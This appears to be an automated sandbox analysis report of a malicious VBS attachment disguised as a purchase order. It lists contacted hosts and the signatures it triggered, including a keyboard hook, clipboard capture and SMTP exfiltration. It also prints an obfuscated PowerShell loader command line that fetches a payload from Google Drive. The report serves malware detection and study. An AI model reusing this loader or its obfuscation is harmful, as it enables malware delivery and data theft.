Source: Yara match	File source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 320, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.64.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
66.29.159.53	smtp.privateemail.com	United States	19538	ADVANTAGECOMUS	false
142.250.81.238	drive.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.81.238	true
drive.usercontent.google.com	142.250.64.97	true
api.ipify.org	104.26.13.205	true
smtp.privateemail.com	66.29.159.53	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Texas_Tool_Purchase_Order#T18834-1.vbs	ReversingLabs: Detection: 26%
Source: Texas_Tool_Purchase_Order#T18834-1.vbs	Virustotal: Detection: 30%			Perma Link

Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 66.29.159.53 66.29.159.53

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C58A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.privateemail.com
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/5m
Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/mmH
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57
Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57-
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWP
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWXRll
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000008.00000002.3277379903.000000000056A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download
Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C4BCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Creates a window with clipboard capturing capabilities

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_3012.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_344.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7452
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7452
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7452	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7452	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed			Jump to behavior

Detected potential crypto function

